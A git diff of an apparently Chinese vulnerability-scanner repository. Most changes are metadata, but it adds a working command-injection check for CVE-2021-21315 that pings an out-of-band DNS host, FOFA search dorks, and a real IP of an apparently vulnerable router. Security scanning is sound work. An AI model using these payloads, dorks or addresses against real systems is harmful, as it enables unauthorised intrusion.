b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "佑友防火墙 弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "佑友防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..81b1471 Binary files /dev/null and b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..42e14d4 Binary files /dev/null and b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..320c20f Binary files /dev/null and b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MicroSoftRCE_CVE_2022_21907/poc.py b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py similarity index 98% rename from poc/MicroSoftRCE_CVE_2022_21907/poc.py rename to poc/MicroSoft/RCE_CVE_2022_21907/poc.py index 446b9b2..fdcf415 100644 --- a/poc/MicroSoftRCE_CVE_2022_21907/poc.py +++ b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py @@ -10,7 +10,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -60,7 +60,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7138310 Binary files /dev/null and b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..afb0468 Binary files /dev/null and b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..34f7529 Binary files /dev/null and b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..39fc882 Binary files /dev/null and b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py index 8274040..65bddd0 100644 --- a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py +++ b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "中科网威 下一代防火墙控制系统 账号密码泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "中科网威 下一代防火墙控制系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5dcc5c2 Binary files /dev/null and b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py new file mode 100644 index 0000000..c4f8158 --- /dev/null +++ b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py @@ -0,0 +1,87 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua,verify_ceye_dns,get_ceye_dns +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Node.js命令注入漏洞(CVE-2021-21315)", # 漏洞名称 + "VulnID" : "CVE-2021-21315", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Node.js", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + Node.js-systeminformation是用于获取各种系统信息的Node.JS模块, + 它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。 + 自发布至今,systeminformation软件包下载次数近3400万。 + + 2021年02月24日,npm团队发布安全公告, + Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315), + 其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。 + + 目前该漏洞已经在5.3.1版本中修复。 + """, # 漏洞简要描述 + + "fofa-dork":""" + app="Node.js" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + success,dns_flag = get_ceye_dns() + if success == False: + return [False,dns_flag] + + url = self.target + "/api/getServices?name[]=$({cmd})".format(cmd = "ping%20" + dns_flag) # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + flager = verify_ceye_dns(dns_flag) + if flager == True: + vuln = [True,dns_flag] + elif flager == False: + vuln = [False,dns_flag] + else: + vuln = [False,flager] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8dc5a13 Binary files /dev/null and b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d159a2e Binary files /dev/null and b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MC573/MC573_Unauth_Access/poc.py b/poc/OKI/UnAuth_MC573/poc.py similarity index 81% rename from poc/MC573/MC573_Unauth_Access/poc.py rename to poc/OKI/UnAuth_MC573/poc.py index 05fbc8a..8fba0cb 100644 --- a/poc/MC573/MC573_Unauth_Access/poc.py +++ b/poc/OKI/UnAuth_MC573/poc.py @@ -9,25 +9,26 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "hansi && jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-12", # POC创建时间 "UpdateDate" : "2022-01-12", # POC创建时间 "PocDesc" : """ - 略 + v1:略 + v2:优化了规则,降低误报率 """, # POC描述,写更新描述,没有就不写 - "name" : "MC573未授权访问", # 漏洞名称 + "name" : "OKI MC573未授权访问", # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "MC573未授权访问", # 漏洞应用名称 + "AppName" : "MC573", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ - IKO MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作 + OKI MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作 """, # 漏洞简要描述 "fofa-dork":""" - "MC573" + "MC573" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 @@ -58,7 +59,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "MC573" in req.text: + if req.status_code == 200 and "MC573" in req.text: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6c2d5c1 Binary files /dev/null and b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/PHPStudy/Back_Door/poc.py b/poc/PHPStudy/Back_Door/poc.py index 6160207..fb7408c 100644 --- a/poc/PHPStudy/Back_Door/poc.py +++ b/poc/PHPStudy/Back_Door/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "PHPStudy 后门检测", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "phpstudy", # 漏洞应用名称 "AppVersion" : "phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..fdb987c Binary files /dev/null and b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..eaa22a0 Binary files /dev/null and b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bd69006 Binary files /dev/null and b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py similarity index 99% rename from poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py rename to poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py index 32eb643..b7aab1d 100644 --- a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py +++ b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c02f5ab Binary files /dev/null and b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5ccbb50 Binary files /dev/null and b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py index 7780c58..467d133 100644 --- a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py +++ b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷云课堂主机 目录遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷云课堂", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..98dbf9d Binary files /dev/null and b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py index 4441b2c..d6e9b3b 100644 --- a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py +++ b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷EG网关 userAuth.php存在任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷EG网关", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..26627c2 Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..dd386ac Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py index 4cf1f94..4759da0 100644 --- a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py +++ b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷NBR 1300G 路由器 越权CLI命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷NBRNBR1300G 路由器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7509887 Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py index e068eb9..e9703fd 100644 --- a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py +++ b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷Smartweb管理系统 默认账户➕命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷网络股份有限公司 无线smartweb管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1f2ca1f Binary files /dev/null and b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5630e5c Binary files /dev/null and b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/RuoYi_若依/Weak_Pass/poc.py b/poc/RuoYi_若依/Weak_Pass/poc.py index 236abf9..fe79766 100644 --- a/poc/RuoYi_若依/Weak_Pass/poc.py +++ b/poc/RuoYi_若依/Weak_Pass/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "若依后台管理系统 弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "若依后台管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c70216a Binary files /dev/null and b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py similarity index 97% rename from poc/SANGFOR_深信服RCE_2020_EDR/poc.py rename to poc/SANGFOR_深信服/RCE_2020_EDR/poc.py index 14d33ec..9acb2d7 100644 --- a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py +++ b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py @@ -10,7 +10,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : " ", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -37,7 +37,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b259b7b Binary files /dev/null and b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..90076e7 Binary files /dev/null and b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py index d2ad2fd..23e7ed3 100644 --- a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py +++ b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "三星 WLAN AP WEA453e路由器 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "三星 WLAN AP WEA453e路由器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7303e00 Binary files /dev/null and b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Sapido/Rce_sapido_BRC70n/poc.py b/poc/Sapido/RCE_BRC70n_Router/poc.py similarity index 81% rename from poc/Sapido/Rce_sapido_BRC70n/poc.py rename to poc/Sapido/RCE_BRC70n_Router/poc.py index 0a1036d..c31e7d9 100644 --- a/poc/Sapido/Rce_sapido_BRC70n/poc.py +++ b/poc/Sapido/RCE_BRC70n_Router/poc.py @@ -4,30 +4,37 @@ from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 +import re urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "hansi && jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-10", # POC创建时间 "UpdateDate" : "2022-01-10", # POC创建时间 "PocDesc" : """ - 略 + v1:略 + v2:该版本对输出做了一定的优化,更简洁 """, # POC描述,写更新描述,没有就不写 - "name" : "sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称 + "name" : "Sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 - "AppVersion" : "BR270n-v2.1.03,BRC76n-v2.1.03,GR297-v2.1.3,RB1732-v2.0.43", # 漏洞应用版本 + "AppVersion" : """ + BR270n-v2.1.03, + BRC76n-v2.1.03, + GR297-v2.1.3, + RB1732-v2.0.43 + """, # 漏洞应用版本 "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ """, # 漏洞简要描述 "fofa-dork":""" - app="sapido-路由器" + app="sapido-路由器" """, # fofa搜索语句 "example" : "http://122.116.238.251:1080", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 @@ -55,7 +62,10 @@ class POC(POCBase): """ req = requests.post(url,headers = headers , data=data,proxies = self.proxy ,timeout = self.timeout,verify = False) if req.status_code ==200 and "Link encap:Ethernet" in req.text: - vuln = [True,req.text] + + result = req.text.split("wrap=\"virtual\">")[1].split("")[0] + + vuln = [True,result] else: vuln = [False,req.text] except Exception as e: diff --git a/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c26476c Binary files /dev/null and b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ab8a7a Binary files /dev/null and b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py index c4dbcc9..7567e3b 100644 --- a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py +++ b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "致远OA ajax.do 任意文件上传", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "致远OA", # 漏洞应用名称 "AppVersion" : """ 致远OA V8.0 diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c5fdc15 Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py index db8b0e8..d181d4c 100644 --- a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py +++ b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "狮子鱼CMS ApiController.class.php SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "狮子鱼CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..27a7e4e Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py index 828c4fd..e50c95c 100644 --- a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py +++ b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py @@ -18,7 +18,7 